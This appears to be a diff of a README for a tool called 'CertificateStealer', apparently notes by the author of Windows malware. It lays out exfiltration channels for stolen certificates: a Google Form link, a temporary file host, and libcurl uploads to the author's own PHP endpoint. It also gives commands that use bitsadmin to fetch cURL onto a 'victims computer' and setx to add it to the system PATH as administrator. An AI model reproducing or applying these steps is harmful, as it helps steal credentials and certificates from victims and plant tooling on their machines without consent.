Lubos-source/CertificateStealer/README.md

 - Then copy share link and write it in google forms: https://forms.gle/QSG9oaR2XfSXptkAA
 - And just Send form :) - it should work anonymously without login.
 - http://leteckaposta.cz/ (30 days then remove)
 - interacting with site with lib: libcurl (curl) *working* with my own domain and PHP file upload script on it. (need to handle how to get CURL on victims computer to be able to use it....)
-Win10 and later should default have it.
+Win10 and laters should default have it.

+### Download cURL with cmd line:

+- `bitsadmin /transfer curlDownloadJob /download /priority high https://curl.se/windows/dl-8.1.1_1/curl-8.1.1_1-win64-mingw.zip C:\Users\user\Download\curl.zip`
+- extract to folder in system
+- add to PATH `setx /M PATH "%PATH%;C:\curl"` (need admin rights not cleaver, must be run as ADMIN)
+- reopen cmd and it can be used :)